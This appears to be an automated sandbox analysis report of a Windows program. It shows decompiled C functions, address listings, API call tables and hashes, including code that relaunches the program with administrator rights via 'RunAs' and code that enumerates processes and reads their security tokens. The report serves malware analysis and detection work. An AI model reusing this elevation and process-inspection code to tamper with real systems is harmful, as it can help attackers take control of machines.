                                                                                                          • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                          • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                          • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                          • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                          • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                        • wcscpy.MSVCRT ref: 004064E4
                                                                                                        • wcscpy.MSVCRT ref: 004064F3
                                                                                                        • wcscpy.MSVCRT ref: 00406503
                                                                                                        • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                        • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                        • wcscpy.MSVCRT ref: 0040657A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                        • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                        • API String ID: 3037099051-2314623505
                                                                                                        • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                        • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                        • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                        • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}












                                                                                                        0x00401c31
                                                                                                        0x00401c33
                                                                                                        0x00401c48
                                                                                                        0x00401c4f
                                                                                                        0x00401c61
                                                                                                        0x00401c68
                                                                                                        0x00401c74
                                                                                                        0x00401c79
                                                                                                        0x00401c7a
                                                                                                        0x00401c7b
                                                                                                        0x00401c84
                                                                                                        0x00401c89
                                                                                                        0x00401c8e
                                                                                                        0x00401c8f
                                                                                                        0x00401c9b
                                                                                                        0x00401ca6
                                                                                                        0x00401caf
                                                                                                        0x00401cb9
                                                                                                        0x00401cc0
                                                                                                        0x00401cc7
                                                                                                        0x00401cce
                                                                                                        0x00401cd5
                                                                                                        0x00401cdd
                                                                                                        0x00401ce0
                                                                                                        0x00401d14
                                                                                                        0x00401ce2
                                                                                                        0x00401ce8
                                                                                                        0x00401cf3
                                                                                                        0x00401cfe
                                                                                                        0x00401d09
                                                                                                        0x00401d09
                                                                                                        0x00401cfe
                                                                                                        0x00401d1b

                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                        • memset.MSVCRT ref: 00401C4F
                                                                                                        • memset.MSVCRT ref: 00401C68
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                        • memset.MSVCRT ref: 00401C9B
                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                        • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                        • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                        • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                        • API String ID: 903100921-3385179869
                                                                                                        • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                        • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                        • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                        • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                        0x00409ab0
                                                                                                        0x00409ab7
                                                                                                        0x00409ac8
                                                                                                        0x00409acf
                                                                                                        0x00409ad4
                                                                                                        0x00409ae0
                                                                                                        0x00409ae6
                                                                                                        0x00409ae8
                                                                                                        0x00409af0
                                                                                                        0x00409c3a
                                                                                                        0x00409c41
                                                                                                        0x00409c67
                                                                                                        0x00000000
                                                                                                        0x00409c67
                                                                                                        0x00409c49
                                                                                                        0x00409c50
                                                                                                        0x00409c51
                                                                                                        0x00409c56
                                                                                                        0x00409c57
                                                                                                        0x00409c5a
                                                                                                        0x00000000
                                                                                                        0x00409c64
                                                                                                        0x00409b00
                                                                                                        0x00409b03
                                                                                                        0x00409b06
                                                                                                        0x00409b0b
                                                                                                        0x00409b10
                                                                                                        0x00409ba9
                                                                                                        0x00409bac
                                                                                                        0x00409bc1
                                                                                                        0x00409bc7
                                                                                                        0x00409bcc
                                                                                                        0x00409bd8
                                                                                                        0x00409bf0
                                                                                                        0x00409bf2
                                                                                                        0x00409c23
                                                                                                        0x00409c26
                                                                                                        0x00409c2f
                                                                                                        0x00409c34
                                                                                                        0x00409c34
                                                                                                        0x00000000
                                                                                                        0x00409c2f
                                                                                                        0x00409bf7
                                                                                                        0x00409bfb
                                                                                                        0x00409c02
                                                                                                        0x00409c06
                                                                                                        0x00409c0d
                                                                                                        0x00409c14
                                                                                                        0x00409c17
                                                                                                        0x00409c18
                                                                                                        0x00409c1b
                                                                                                        0x00409c1e
                                                                                                        0x00000000
                                                                                                        0x00409c1e
                                                                                                        0x00409b1f
                                                                                                        0x00409b25
                                                                                                        0x00409b2a
                                                                                                        0x00409b2d
                                                                                                        0x00409b33
                                                                                                        0x00409b3d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409b4b
                                                                                                        0x00409b53
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409b6a
                                                                                                        0x00409b6c
                                                                                                        0x00409b6e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409b77
                                                                                                        0x00409b7b
                                                                                                        0x00409b82
                                                                                                        0x00409b86
                                                                                                        0x00409b8d
                                                                                                        0x00409b8e
                                                                                                        0x00409b94
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00409AB7
                                                                                                        • memset.MSVCRT ref: 00409ACF
                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                        • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                          • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                        • memset.MSVCRT ref: 00409B25
                                                                                                        • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                        • memset.MSVCRT ref: 00409BC7
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                        • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                        • API String ID: 3504373036-27875219
                                                                                                        • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                        • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                        • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                        • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                        0x00409179
                                                                                                        0x00409209
                                                                                                        0x00409209
                                                                                                        0x00409185
                                                                                                        0x0040918a
                                                                                                        0x0040918f
                                                                                                        0x00409208
                                                                                                        0x00000000
                                                                                                        0x00409191
                                                                                                        0x0040919e
                                                                                                        0x004091a2
                                                                                                        0x004091a7
                                                                                                        0x004091af
                                                                                                        0x004091b3
                                                                                                        0x004091b8
                                                                                                        0x004091c0
                                                                                                        0x004091c4
                                                                                                        0x004091c9
                                                                                                        0x004091d1
                                                                                                        0x004091d5
                                                                                                        0x004091da
                                                                                                        0x004091e2
                                                                                                        0x004091e6
                                                                                                        0x004091eb
                                                                                                        0x004091ed
                                                                                                        0x004091ed
                                                                                                        0x004091eb
                                                                                                        0x004091da
                                                                                                        0x004091c9
                                                                                                        0x004091b8
                                                                                                        0x004091ff
                                                                                                        0x00409202
                                                                                                        0x00409202
                                                                                                        0x00000000
                                                                                                        0x004091ff

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 1182944575-70141382
                                                                                                        • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                        • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                        • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                        • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                        0x004090f5
                                                                                                        0x00409171
                                                                                                        0x00409171
                                                                                                        0x004090fd
                                                                                                        0x00409103
                                                                                                        0x00409107
                                                                                                        0x00409170
                                                                                                        0x00000000
                                                                                                        0x00409170
                                                                                                        0x00409116
                                                                                                        0x0040911a
                                                                                                        0x0040911f
                                                                                                        0x00409127
                                                                                                        0x0040912b
                                                                                                        0x00409130
                                                                                                        0x00409138
                                                                                                        0x0040913c
                                                                                                        0x00409141
                                                                                                        0x00409149
                                                                                                        0x0040914d
                                                                                                        0x00409152
                                                                                                        0x0040915a
                                                                                                        0x0040915e
                                                                                                        0x00409163
                                                                                                        0x00409165
                                                                                                        0x00409165
                                                                                                        0x00409163
                                                                                                        0x00409152
                                                                                                        0x00409141
                                                                                                        0x00409130
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                        • API String ID: 667068680-3953557276
                                                                                                        • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                        • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                        • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                        • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                        0x00409faf
                                                                                                        0x00409fb4
                                                                                                        0x00409fb5
                                                                                                        0x00409fb6
                                                                                                        0x0040a043
                                                                                                        0x0040a04a
                                                                                                        0x0040a058
                                                                                                        0x0040a05f
                                                                                                        0x0040a06d
                                                                                                        0x0040a074
                                                                                                        0x0040a08e
                                                                                                        0x0040a099
                                                                                                        0x0040a0ab
                                                                                                        0x0040a0c9
                                                                                                        0x0040a0ce
                                                                                                        0x00000000
                                                                                                        0x0040a0ce
                                                                                                        0x00409fc3
                                                                                                        0x00409fca
                                                                                                        0x00409fd8
                                                                                                        0x00409fdf
                                                                                                        0x00409ff9
                                                                                                        0x0040a006
                                                                                                        0x0040a018
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf
                                                                                                        • String ID: %%0.%df
                                                                                                        • API String ID: 3473751417-763548558
                                                                                                        • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                        • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                        • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                        • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                        0x00406216
                                                                                                        0x0040621b
                                                                                                        0x00406222
                                                                                                        0x0040625f
                                                                                                        0x00406263
                                                                                                        0x00406269
                                                                                                        0x00406271
                                                                                                        0x00406273
                                                                                                        0x00406289
                                                                                                        0x00406289
                                                                                                        0x0040628e
                                                                                                        0x0040628f
                                                                                                        0x004062a9
                                                                                                        0x004062ab
                                                                                                        0x004062ad
                                                                                                        0x004062b0
                                                                                                        0x004062c3
                                                                                                        0x004062c3
                                                                                                        0x004062d3
                                                                                                        0x004062da
                                                                                                        0x004062f1
                                                                                                        0x004062f7
                                                                                                        0x004062fe
                                                                                                        0x0040630d
                                                                                                        0x00406312
                                                                                                        0x0040631e
                                                                                                        0x00406327
                                                                                                        0x00406275
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406285
                                                                                                        0x00406287
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406277
                                                                                                        0x0040627a
                                                                                                        0x00406280
                                                                                                        0x00406280
                                                                                                        0x00000000
                                                                                                        0x00406280
                                                                                                        0x00000000
                                                                                                        0x0040627a
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406273
                                                                                                        0x00406224
                                                                                                        0x00406224
                                                                                                        0x00406229
                                                                                                        0x0040622a
                                                                                                        0x0040622f
                                                                                                        0x00406236
                                                                                                        0x0040623c
                                                                                                        0x00406243
                                                                                                        0x00406245
                                                                                                        0x00406247
                                                                                                        0x00406248
                                                                                                        0x0040624b
                                                                                                        0x00406254
                                                                                                        0x00406254
                                                                                                        0x0040632d
                                                                                                        0x00406334

                                                                                                        APIs
                                                                                                        • LoadMenuW.USER32 ref: 00406236
                                                                                                          • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                          • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
